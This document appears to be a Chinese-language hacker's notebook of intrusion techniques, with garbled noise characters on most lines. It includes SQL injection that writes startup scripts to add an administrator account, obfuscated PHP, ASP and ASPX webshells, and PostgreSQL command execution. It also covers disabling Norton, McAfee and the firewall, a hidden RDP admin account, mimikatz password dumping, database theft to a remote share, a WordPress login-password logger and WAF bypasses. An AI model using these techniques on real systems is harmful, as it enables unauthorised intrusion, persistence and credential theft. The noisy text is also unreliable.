! l" w, d! ^" H. a! vinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
8 w! h! m+ l! o( v+ j4 M, t+ Y Tinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );: e* r4 `8 r2 ]" N, k
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";6 L, T" [3 z! Q: W2 N- j7 B9 A9 ^7 U
drop table a;
2 J7 Q4 b4 o! j7 y$ e2 u# Y7 a; L8 Z V
英文版本:, B4 y# A; U! @/ ]# G
4 M4 J( S8 h4 S. D; d" xuse test;
: y8 e; v% O& v5 t* D' Z: Xcreate table a (cmd text);2 }8 {$ F5 J4 K/ h8 z
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
/ O( z1 g3 D/ u* Q# m$ y+ uinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );. e" X' R) e. ?& |! I3 ~
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
* x% ~0 S8 N, B5 Z( ?7 G4 `select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";% E! T9 \0 t. ]; ^2 |, i
drop table a;1 @& P9 O& v6 q. q
/ a7 s. j: { q/ l, ^/ j W" \create table a (cmd BLOB);) K1 [: ]/ M! R- m* D8 B4 C/ v% w
insert into a values (CONVERT(木马的16进制代码,CHAR));
: B9 S4 M4 V7 j( a, ^select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe' e% Y: u6 J' N* P( b( }9 H- C( _
drop table a;
( Z) C# [1 R6 i- J4 q" d6 H( v3 h. H- s. W8 O
记录一下怎么处理变态诺顿
4 c+ W4 u( T+ T- d4 u8 B% Z查看诺顿服务的路径
. f% F. n% Q- b1 ssc qc ccSetMgr
- u& i2 O t3 S. E然后设置权限拒绝访问。做绝一点。。5 N% F& o; D! G' |) }0 J
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system6 @8 n0 D9 k$ W: X" {8 \( _) p* w) n
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"2 W1 |/ E; \! ~$ Q2 ?
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
) t4 b# Z6 _9 t* Dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
* ]( s( C& b* e* m0 u0 n% b# N
; R7 U# Z: g& J: H然后再重启服务器- X; h6 _( B& X( D* [& H( Q
iisreset /reboot: h, \$ b B# X
这样就搞定了。。不过完事后。记得恢复权限。。。。
$ _+ ]- b5 `" i. I+ y2 I ~cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F- h+ q+ G$ M, Y4 d
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F, P4 D) m2 Z& L. `
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F! B& F6 ? V7 T. [, B; B
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
: N7 [, K* o! z6 D" oSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
! N% S+ E! r' K& y3 D H4 h
6 j2 |* ]" i9 i; X; vEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
+ U7 L# q4 A: g8 s8 B) H. J) g4 v, A: m0 U
postgresql注射的一些东西
5 K+ w* k6 O0 @ Z* U如何获得webshell
' L5 T; E7 V# k1 z1 uhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
U0 C# V i% {3 P2 A8 C; [+ Khttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
& ]5 `1 e) k f. l6 Bhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;+ x1 u) p5 Y2 A5 _7 A T
如何读文件9 }1 x! G: a. q) p/ C& i% f
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);* E0 c0 w) r3 D9 |' O/ u6 W6 ^
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;/ d" B/ v, W# C' v" H- o+ L+ S) p3 x1 G
http://127.0.0.1/postgresql.php?id=1;select * from myfile;/ g/ A7 I2 V! P6 u# _$ g! m
u5 Q N y1 P* Y1 |+ j* \" @z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
7 C& y% b8 y6 s- T* S; H$ f当然,这些的postgresql的数据库版本必须大于8.X
* [/ W- b/ O& h. ^# I创建一个system的函数:% r6 \4 X$ [' Q7 x) s: S
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT/ G8 p6 \0 C" W% R7 U) S Q. M
1 ^8 Q8 `+ z) _0 i创建一个输出表:
- z, ]$ p) }6 @% D" f$ a7 M0 f5 GCREATE TABLE stdout(id serial, system_out text)
: B; R& p9 s, K& _4 p6 U
6 g6 P* u, a% E, M& a执行shell,输出到输出表内:6 j2 Y5 d4 n9 }2 E
SELECT system('uname -a > /tmp/test')& F3 w' Q' P- D
! M. \. A2 B" v2 fcopy 输出的内容到表里面;
1 c$ b1 E3 b' Z7 G2 W/ B* rCOPY stdout(system_out) FROM '/tmp/test'
! P5 S( m' s, A9 S$ O& h$ N* w7 z0 @& b3 O8 r
从输出表内读取执行后的回显,判断是否执行成功* I# O/ X! }9 @8 V- Z! J; N" w* }8 t
+ w. t, m4 w N" v7 BSELECT system_out FROM stdout8 c6 u% [# e! V c9 B9 A
下面是测试例子5 G; M8 A- L: V; `
/ J7 d' u5 j! r: r$ |/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
- U* Y) f' I) d) z, M$ N0 F J
% D, a$ e3 I. b/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
% z; d+ s# c3 t8 U' m2 k3 Q6 i! pSTRICT --
' S( ^+ o% W' X5 y5 h" T3 j# x ~/ @ D1 L/ c7 N; o5 |! n
/store.php?id=1; SELECT system('uname -a > /tmp/test') --2 W- p1 s$ q2 v4 Q7 J6 h7 h
$ N' b9 k8 [: Y7 Z0 L
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --9 K* G6 Q6 j' |) t8 f$ N: n8 {
6 B; v. r3 f0 ]( m$ s6 B/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
% R2 U2 G" S% [net stop sharedaccess stop the default firewall
. U5 \2 Y7 ^/ Gnetsh firewall show show/config default firewall
) k" Z7 ^; n" l# }6 _netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
* l' q8 @- H! G& C9 {8 E9 gnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall6 s4 p" z3 f1 K- X
修改3389端口方法(修改后不易被扫出)* E' a" f! A. i4 m2 _' |: \. P
修改服务器端的端口设置,注册表有2个地方需要修改" E. |+ D" H5 v+ c9 k/ S4 t" }
1 l5 k9 @7 t+ P( C7 E* p[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]1 M5 Y2 k2 C& g5 S% L8 \
PortNumber值,默认是3389,修改成所希望的端口,比如6000
- z! U8 k/ h( u) z, u+ h2 j- g- G. e5 X6 o# \2 d; T$ u
第二个地方:
3 ~' ]( A, @! J2 f[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] * ]& }# R1 Q) E+ W
PortNumber值,默认是3389,修改成所希望的端口,比如6000+ ^# z' ]( M7 M+ N; T
* B! d) ^, B5 q; J现在这样就可以了。重启系统就可以了
1 c6 X7 Y/ E# N; y7 g
0 @9 Q, c+ g0 d8 D9 z查看3389远程登录的脚本8 p# \7 l* s l6 Z, z# y- _
保存为一个bat文件
5 [8 x& {4 J5 J/ Gdate /t >>D:\sec\TSlog\ts.log8 Y% B3 ?' h3 u- a) J" K% a
time /t >>D:\sec\TSlog\ts.log
7 Y% J" Q" b. {netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log4 |7 Y, l) F- Z: W& \7 R9 A Q
start Explorer
7 l0 w3 f# M2 C* h J: I9 _- [; ~/ Z8 g: h* {: I0 E
mstsc的参数:
3 k7 G" @% i1 C+ v$ l3 n' s
1 |; ~- f, M8 \6 H, C远程桌面连接; J9 X, ]0 T6 m2 J! z
+ A2 y S% x2 K5 U X% h4 s
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]8 }& v( J& |' s; @) o- j' N
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?- f& E- k! V4 t, Y# q
' O+ S& E- I1 O% U4 Q
<Connection File> -- 指定连接的 .rdp 文件的名称。2 C/ s: V5 z- {; q' D" u
/ n. i9 a7 |) S! l/v:<server[:port]> -- 指定要连接到的终端服务器。
! h3 G$ }- S8 p |5 J
! h5 @% H7 z' E9 c$ b/console -- 连接到服务器的控制台会话。
! Y% t0 H( u; y5 D ]6 ~: M# ~" h
0 F3 `1 y1 Z. j: X! d( x/f -- 以全屏模式启动客户端。1 Q6 X8 {+ D! M8 ~
7 Y* ^+ i/ m. c" V9 s
/w:<width> -- 指定远程桌面屏幕的宽度。
0 x+ m" _/ m0 e- y3 w8 l
0 z) ]7 N x/ W. |& e- S, [/h:<height> -- 指定远程桌面屏幕的高度。. R& v+ c- q4 n1 A( L
x3 o( i) Q; |8 `7 j
/edit -- 打开指定的 .rdp 文件来编辑。
5 a: k) f% o' k. D5 V n( S/ h j: P: D: V7 r4 V0 D) l
/migrate -- 将客户端连接管理器创建的旧版
- t% p& N4 {/ a" m- q4 M* B连接文件迁移到新的 .rdp 连接文件。( N/ B. [! j. E, u5 q5 D* P
# M- Z' ?# p2 K9 e6 s4 E: e5 c' M9 F7 k+ e- I. Q' o; J
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就* R, T$ c8 m$ T# G% N& H
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
7 \2 B0 H# E3 F: m6 j
* K# N* C5 m7 H6 y6 {7 M4 X. K命令行下开启3389) d E9 l5 w& s% I
net user asp.net aspnet /add3 O7 C7 L2 T7 _2 E! Z
net localgroup Administrators asp.net /add
* \. ^. n( Q7 V. Q! y1 }; Snet localgroup "Remote Desktop Users" asp.net /add
" k" ?+ p' `9 ?attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D2 F- C% q( v# C
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
; V2 _" o* Q& w5 h' {# Fecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 19 j* O( N8 P" L( x6 {; K; P
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f, h3 p+ b9 Y+ P1 h4 l' u
sc config rasman start= auto
5 q! c; l/ v9 }8 Isc config remoteaccess start= auto
$ o' f( G) e+ }net start rasman' i0 B# T. O4 d, s+ H9 }, W
net start remoteaccess
7 P# }; I0 u0 M- W! s6 WMedia
2 y* P& x$ x9 G5 M( k; q<form id="frmUpload" enctype="multipart/form-data"
& b' W& B4 a" D. o9 M( Jaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
% Z% ^3 {, s' y% |7 X2 O7 l9 m1 q<input type="file" name="NewFile" size="50"><br>0 C$ t. @1 o% k- q& j: p
<input id="btnUpload" type="submit" value="Upload">
4 Z/ U- s( S; x. H$ d</form>
- P9 M: @ `: B7 k* o" K4 }: ]0 ]2 t; J ^3 b* E- f
control userpasswords2 查看用户的密码% Z% _) C% U& J6 Q% }+ q) B* h" T
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
1 k( Z0 [; Q* r; C0 D: x0 NSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
' v/ B4 R; |9 \$ m+ X. L5 l0 `3 k( F) F5 r
+ P7 s4 F( \1 P- ]$ \141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
$ z7 A. ^4 F6 n/ b2 A4 r6 Z4 i. X" A测试1:
5 ~; `- O( P* V9 {1 ]4 Q! |SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
6 D0 Z7 k1 g3 i. z, _7 Q, Z3 C$ o2 ]5 `9 d ]: u
测试2:
5 u: Y5 N% G% R/ O- g
6 Y) H7 a. [0 V! m6 pcreate table dirs(paths varchar(100),paths1 varchar(100), id int)1 i% B7 Y, y5 P: e8 |5 [% {
. Z0 x2 {3 X6 ]delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--1 j" n8 T' ?* x
2 q5 _" n% a, A; L s3 Q) G. c
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
4 [& J* P. @3 K6 h u关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令4 x$ J$ k, H6 r+ S
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
" R/ m, Y( M, \, p \1 [3 bnet stop mcafeeframework
: e% N O0 s5 N5 F |. Inet stop mcshield
8 c# l! L7 b5 T7 A! r1 z2 D! D( W2 @9 gnet stop mcafeeengineservice
' y/ B0 V& M0 Rnet stop mctaskmanager6 \5 s$ y4 Y O3 K( I8 L; f, ]
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D4 z6 F! G u# m) l" G
r! y7 a" U) Z2 c# B/ S VNCDump.zip (4.76 KB, 下载次数: 1)
6 t+ P% C6 F, ~密码在线破解http://tools88.com/safe/vnc.php- @5 V o8 a! S& Y3 ~; x7 q: G& p9 f* d
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
% E7 s) `* y0 \& Y1 l8 }6 s3 p% t8 Z g2 I) W: D
exec master..xp_cmdshell 'net user'( E0 {$ H% z3 d3 X& [& s) s
mssql执行命令。3 e+ g3 f9 l* w2 O* K4 L7 ^
获取mssql的密码hash查询/ O# ~' i5 T g( @5 O$ }% ~. I
select name,password from master.dbo.sysxlogins0 g3 ^4 ~9 [& B& d2 V
" _, B5 Z4 ]1 Y/ l
backup log dbName with NO_LOG;
$ Y+ ~1 S2 k3 t: S" q2 d' v! fbackup log dbName with TRUNCATE_ONLY;
* z/ H: X4 r% sDBCC SHRINKDATABASE(dbName);! Y% o# X9 x! L% z
mssql数据库压缩# s2 ]9 P5 [: d# Z% i U
1 X* H9 @+ h& G$ T1 F3 G! k" v
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK5 K: C7 b) A! ]
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
2 m, K Y' D1 Q" ?( S
* u- k* x) H2 n1 w j5 j% G# jbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'; q+ |2 [, e% y' ]/ j7 c5 w
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak* B, `$ c" R" [, M1 F. n
) o: b; M% w+ f. ?8 WDiscuz!nt35渗透要点:
4 W* w7 W* D/ x. J& X(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default: l- y2 A2 c$ O. L3 f% {+ [
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>5 g _' K f0 e K) P5 E
(3)保存。 q8 R# z1 a! E
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
4 h3 i: h6 E: q: I+ zd:\rar.exe a -r d:\1.rar d:\website\* ?. C ~; {# h, \+ m0 _
递归压缩website
- P) Y" }! Q* c, d( L; E Z2 h' @$ ]' m注意rar.exe的路径
# \% D- F2 L$ [3 c+ O, ^+ @
) k/ w2 }3 W: s' K) Q<?php1 y. \7 _- j5 W& }
) r3 P) u* r$ M A; C! K, }. A$telok = "0${@eval($_POST[xxoo])}";
* y# A1 a" A1 R1 l a: J, F: o) `
$username = "123456";
0 O6 p8 b$ |% G! W" g5 y7 T; \) n: f" H8 j) K) q# v
$userpwd = "123456";5 ~% E4 p* i$ R* X+ H' M
$ B0 d2 r9 c3 m& P8 x' u5 e1 `+ S$telhao = "123456";
+ B0 M- { ?% e5 R
- D4 m% g: j0 A$ x$telinfo = "123456";
. ?0 Y b. h' \2 O
/ E. H9 o3 |" J9 G( ~+ N?>' f) w: W& h; T9 I0 ?% k2 j
php一句话未过滤插入一句话木马* e3 G0 L) _& b! L& i a4 \
' w9 k' F6 l6 Q3 i2 A
站库分离脱裤技巧
' P; |% g# m" w' p, Lexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'; f g& s1 X$ }. @9 f Z; N+ v
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'& d4 M9 A( @: j) L
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。7 r7 t! A2 E. }+ p2 j: \2 L+ R5 p
这儿利用的是马儿的专家模式(自己写代码)。 m: \! x# C2 t7 A3 e
ini_set('display_errors', 1);
5 V7 a+ S5 ^! @* N( Fset_time_limit(0);
+ d/ C1 D% _4 ~5 |+ Cerror_reporting(E_ALL);
1 X8 H8 H/ y5 ]8 {$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());8 c( T8 v- R% Z: a- T* v
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());0 ]! J, }4 h, h) [5 l
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
9 x. K1 T& F4 s2 j$i = 0;0 j+ f( p# n5 S) a6 x+ c( h8 G! z* h4 W
$tmp = '';8 ]# j4 b+ A& q9 z
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
R( U4 H' Q- B6 Q- V, I- ~; Q5 V $i = $i+1;6 `, G6 |; n0 W
$tmp .= implode("::", $row)."\n";
! N k" t: S1 J! z4 Z if(!($i%500)){//500条写入一个文件% W2 X# B' Q! R: e, J; I) ^
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';: A; V4 V! A( g
file_put_contents($filename,$tmp);" w' X% D0 {8 D `' y" c. u3 m4 i
$tmp = '';; B0 ~3 y5 C3 c( l$ b1 c- A5 a
} R! r" I( h v
}; F0 i) E% I* C1 X, K
mysql_free_result($result);
2 B' m& F: m2 x" R, g5 s" w3 p# l4 S9 u i, r
6 z* D( t% y; c W' e9 a8 Z
( j. n. x5 S- g u0 c* ]$ \) S
//down完后delete
1 i/ b. o/ k6 e0 n5 z
! j& W8 w; @3 D e- s& M% P! _; e4 z. a( k0 U6 e
ini_set('display_errors', 1);7 X, u6 F u' r. U2 ^& Y
error_reporting(E_ALL);6 w$ g. d4 X3 c# D1 ]
$i = 0;
' j$ T i" E( h; Vwhile($i<32) {, R: I# W, o. s/ P0 N+ T. }
$i = $i+1;5 I$ n! |7 G2 t- t/ Z3 i/ X
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';* i, ~7 z- i6 Z) m: a$ h! Y
unlink($filename);* ^( j y6 G: r8 O+ ]5 o% W' f
}
, J. W% D9 }3 D" r3 Ghttprint 收集操作系统指纹) u3 H; f' [8 {, t( X" o; O
扫描192.168.1.100的所有端口
' k) ?) i# V6 \' F+ c3 @0 Fnmap –PN –sT –sV –p0-65535 192.168.1.100- u4 u$ H- w3 h
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
5 Z8 Q) O8 O% O) h$ fhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
D2 z6 D/ F# I* i" ONetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
4 i4 }0 v( N0 I R4 h
( a+ y" v" ?1 \# ?( J6 C8 \/ {& YDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)& T: O; T' v. W" A
# C- _4 z* S$ K6 s9 R
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)$ R/ N8 ?! b0 J% }0 o4 V. _9 J
# W; ?! E" x, C# W: j% Y
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
7 ~; W! s! y3 }0 V8 F7 V3 i& ?, B# o% [( [
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
y0 j2 M* k9 [% G7 B4 o0 E3 Y ?' `& N% j( o
http://net-square.com/msnpawn/index.shtml (要求安装)
& f' c J4 P- b& p- O
5 b$ L1 h6 T% k, J! \ tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)) ^% s, R$ ~9 N8 l5 C
9 Z# g) l4 `; J) U
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
: ~ J! G+ T( Y& t- F% [& p0 fset names gb2312; C1 }4 h& N3 l% v9 }' k
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
) H* j9 v7 |* i8 R1 J+ @# c/ j4 F6 j; d0 f8 h
mysql 密码修改
0 U( ^4 L( ?7 |$ Y9 o! t* }UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” ' @- B4 R* z, N6 }' l
update user set password=PASSWORD('antian365.com') where user='root';% V! E6 ^+ }: i; `+ O: N- {
flush privileges;
' A8 ~( `& j+ Q4 r+ q+ E高级的PHP一句话木马后门
5 a1 {2 j. U6 \4 n# g) _; I5 @1 x; O9 W, N" [
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀 T. S# v3 R2 M1 Z4 w/ X
6 e j! y' c( |) b3 V' X, Q' j
1、 b- R6 i% M$ O2 k
7 P/ A1 m* b* [' l& |0 \$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";( J0 W. K* c7 g1 n' f% v
2 [1 z& v8 x$ l1 C+ Q. e7 x( f$hh("/[discuz]/e",$_POST['h'],"Access");
~* \* u5 @7 A: d+ ^7 P* Q
3 N6 @$ o; M+ U6 P: d//菜刀一句话1 F/ p# o. k+ l* I7 j# Q E& l
3 C7 y3 |' O: c; J6 t; p' r6 g& {
2、
% `# M1 W. f% [, j$ d2 S; w- b( ^0 p) j7 h6 D) o3 g1 m" ?; f
$filename=$_GET['xbid'];3 m. ]$ E) u9 b2 j
6 I8 R; B- L0 w$ i, X6 yinclude ($filename);
9 J0 Q" _# ]* Z% l2 C- _ y$ G8 s
//危险的include函数,直接编译任何文件为php格式运行1 {# g2 J _8 x( v/ u3 B
4 l5 o" K' M. ?. ~7 n, u7 D
3、
1 e( Z" p- P: b3 S6 V5 ?. G# Q" k a% {9 v5 u' {1 o
$reg="c"."o"."p"."y";5 W' ^: _7 l6 G* ~' }; ?$ O I4 a
% b0 V( m/ \, ?9 z
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
$ G/ E" R" x* \2 r
, _ Q' Q0 L6 u4 N# T- k$ m//重命名任何文件0 [+ S, n4 ^, w; H
& r4 C! g6 d) |% ^' g* @8 o4、6 P: @+ O4 \( a
6 C- j" P" C5 @' ^% b$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$ g# w' N* N0 |- s1 m* s+ P. [* ^
6 ^* V3 A; F( Y9 a
$gzid("/[discuz]/e",$_POST['h'],"Access");
- A, r# E' k$ X0 H% M& f5 L3 I7 H- x2 @; Q: T
//菜刀一句话
4 {/ x! _& w0 w( H9 A
( a% G: M" T" u8 K) I5、include ($uid);
" h$ z1 [1 f4 W- L( ^' ~6 U( T. d
3 K8 J& E$ x3 }% f' q/ k//危险的include函数,直接编译任何文件为php格式运行,POST : G/ s; g0 Y. x: k; q* r2 S
* \7 t8 N( i* q6 j, \
0 r4 c% t/ b4 [+ ~//gif插一句话
2 Y' ?( _7 I& w0 [6 P* v2 Z3 A- N- R. s, E2 W+ O$ X7 s* V# ]
6、典型一句话& b) }2 r* l, X. t/ A" o0 r; t' K
Q. I. j& d3 L9 e) _) t程序后门代码
) M0 t) P, Q6 c# [" b5 Y<?php eval_r($_POST[sb])?>
* I8 J2 o6 _4 c& h. T程序代码8 T7 c5 k- ~: M$ H2 e) A. X
<?php @eval_r($_POST[sb])?>$ t$ Q4 t6 O( p: N( \* a
//容错代码0 V6 [3 [5 E1 y, l4 G6 ?
程序代码0 A$ z+ X* O: X' R# I4 b o
<?php assert($_POST[sb]);?>' t0 h/ }- n: P/ ]
//使用lanker一句话客户端的专家模式执行相关的php语句
9 A* {: G, |4 I( L& W& ^: t程序代码 y3 W, R- X+ h5 \) j+ |
<?$_POST['sa']($_POST['sb']);?>
# P" v2 Z2 w0 w% M% A程序代码
; [! ?9 \; j$ K<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>7 p4 Z ]. f$ S- H4 `9 w
程序代码7 G* p u7 O0 H8 h% ]8 W
<?php6 n$ h9 u+ x# ^
@preg_replace("/[email]/e",$_POST['h'],"error");
' O2 B' A& X& }+ b?>0 }8 D8 t( j4 S9 W# m: C; ~7 S x$ O
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
; @/ h: i. c* _: C* w; \' r1 U/ k程序代码
. z4 v3 {6 j' s+ b, I/ d<O>h=@eval_r($_POST[c]);</O>
7 F- Q) u1 W- L程序代码' s6 |0 F# H' Z% _
<script language="php">@eval_r($_POST[sb])</script>( ?* d H* a( |5 d( G
//绕过<?限制的一句话
, k& o' A3 J5 J
1 [3 S& J x4 F" u9 ] a1 Uhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip- ^4 q) @2 w' A, b
详细用法:
4 x$ T* J ]- Y6 t1、到tools目录。psexec \\127.0.0.1 cmd: k9 w- p2 ]) W4 T; I
2、执行mimikatz/ O6 i( [$ v# O
3、执行 privilege::debug" r8 ?2 M5 v1 H
4、执行 inject::process lsass.exe sekurlsa.dll
+ c0 d" v$ q+ e) ~5、执行@getLogonPasswords
9 Q* i: k/ E, [! F* d6、widget就是密码3 D3 j) A3 V4 W" K: Y- ?
7、exit退出,不要直接关闭否则系统会崩溃。/ u4 D) j1 R c3 r2 N
8 k8 i- q/ R. c% T5 d+ k& E
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面4 I2 U# Y. v3 \& b
& D; i5 _# u0 p# j' m* ?4 A) a
自动查找系统高危补丁
h3 C1 p" w8 p9 b" nsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt+ W% t8 O4 v: a- O j. g: P
4 Y6 W* g; q7 a0 [) E
突破安全狗的一句话aspx后门% Y3 k& t. \3 k
<%@ Page Language="C#" ValidateRequest="false" %>% X7 S& f0 m7 l( ]
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>' C% c5 ]5 N& N5 Y# D- _
webshell下记录WordPress登陆密码
" N4 M9 l, k J$ ^) cwebshell下记录Wordpress登陆密码方便进一步社工
9 v4 y" `- q* K在文件wp-login.php中539行处添加:' C- N% |6 ~) T8 d7 b- U
// log password
( x) L# m7 J8 I* i$log_user=$_POST['log'];
9 l9 o/ ~; p7 ?9 P9 ^3 o$log_pwd=$_POST['pwd'];
1 R$ p: f* n$ E" }9 Q3 M$log_ip=$_SERVER["REMOTE_ADDR"];, J" L w7 w$ A, ?+ D( o9 n& c2 Q
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;: X% T# k9 {6 o m. D7 m0 o8 V/ a
$txt=$txt.”\r\n”;0 e* p; c M, |
if($log_user&&$log_pwd&&$log_ip){
7 K; Y$ r; ^3 \6 v# }5 s@fwrite(fopen(‘pwd.txt’,”a+”),$txt); x s' ?1 W& M) g* E. j0 M" Y
}7 a j# Q D8 U/ x) ]6 p
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
8 @5 b! @- ~4 T6 a! P就是搜索case ‘login’" |" h. @! m1 c( x+ p; U
在它下面直接插入即可,记录的密码生成在pwd.txt中,
' {, m, n' x7 T1 L) C其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录' }8 M. m5 R. n
利用II6文件解析漏洞绕过安全狗代码:' K d. E% }3 n" e7 M% l Y! s
;antian365.asp;antian365.jpg0 B* {. ?- d, G, w3 w" q9 ?
